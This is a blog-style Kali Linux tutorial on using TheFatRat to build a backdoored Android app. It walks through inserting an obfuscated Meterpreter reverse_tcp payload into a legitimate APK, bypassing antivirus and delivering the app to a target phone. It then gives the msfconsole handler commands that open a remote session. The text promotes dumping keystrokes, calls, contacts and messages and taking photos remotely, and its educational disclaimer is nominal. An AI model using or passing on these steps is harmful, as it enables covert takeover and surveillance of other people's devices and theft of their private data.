KingsOfCodes
Disclaimer
This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and www.kingsofcodes.ml will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
In this Kali Linux Tutorial, we show you how to use TheFatRat Tool. It is a simple tool to build a backdoor file and post exploitation attacks like browser attack. This tool creates a malware with payload and afterward, the perfectly generated malware will be executed on Windows, Android, Macintosh and Other Platforms.
Malware that generated through TheFatRat Tool has the ability to bypass Antivirus security. By bypassing AntiVirus & Firewalls allows attackers to gain a Meterpreter session to control Device.
Automating Metasploit Framework functions
- Create backdoor file for Windows, Mac, and Android
- Bypass antivirus backdoor
- Checks for Metasploit service and starts if not present
- Easily creates meterpreter reverse_tcp payloads for Windows, Android and Mac and another
- Start multiple meterpreter reverse_tcp listeners
- Fast Search in searchsploit
- Bypass AntiVirus
- File pumper
- Create backdoor with another technique
- Autorun script for listeners ( easy to use ) Get access to Targeted Android Phone – Kali Linux Tutorial
You can download TheFatRat tool from Github
Command
git clone https://github.com/Screetsec/TheFatRat.git
Once this command executed it would clone and stored under TheFatRat Tool
cd TheFatRat
Then we need to provide execute permission and run setup.sh in Kali Linux Terminal.
chmod +x setup.sh && ./setup.sh
Installation would take 5 to 10 minutes, during the process it checks for missing files if anything missing it will automatically download and install it.
installation completed you will be provided with the list of options to create a payload.
In this Kali Linux Tutorial, we go on backdooring with original APK file like, so we need to select option 5 here.
In the mean, we should have download any popular Android application file APK and then need to enter the path of the file.
Once it has done all we need to select the Meterpreter to use, here we have selected reverse_tcp.
And then you need to select the tool to be used in APK creation.
APK build in process, it decompiles the original .APK file to insert payloads and then recompile the application. It uses obfuscation methods to include payloads also it appends a digital signature.
Once you have the payload created with original .APK file you can move to mobile phones through File transfer or any other ways.
Then we need to setup meterpreter session through msfconsole.
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip)
set lport (same port provided before)
exploit
Once the application installed, you will get the meterpreter session on terminal and complete control over the device.
By typing ‘help‘ you can find all the possible commands to execute and Control.
You can dump keystrokes, calls, contacts, messages and even you can snaps with the mobile remotely.
Credit to TheFatRat Tool's Authors team for building such an Awesome and easy to use/implement.
Post a Comment
Hi Users, if you have any queries then please let me know.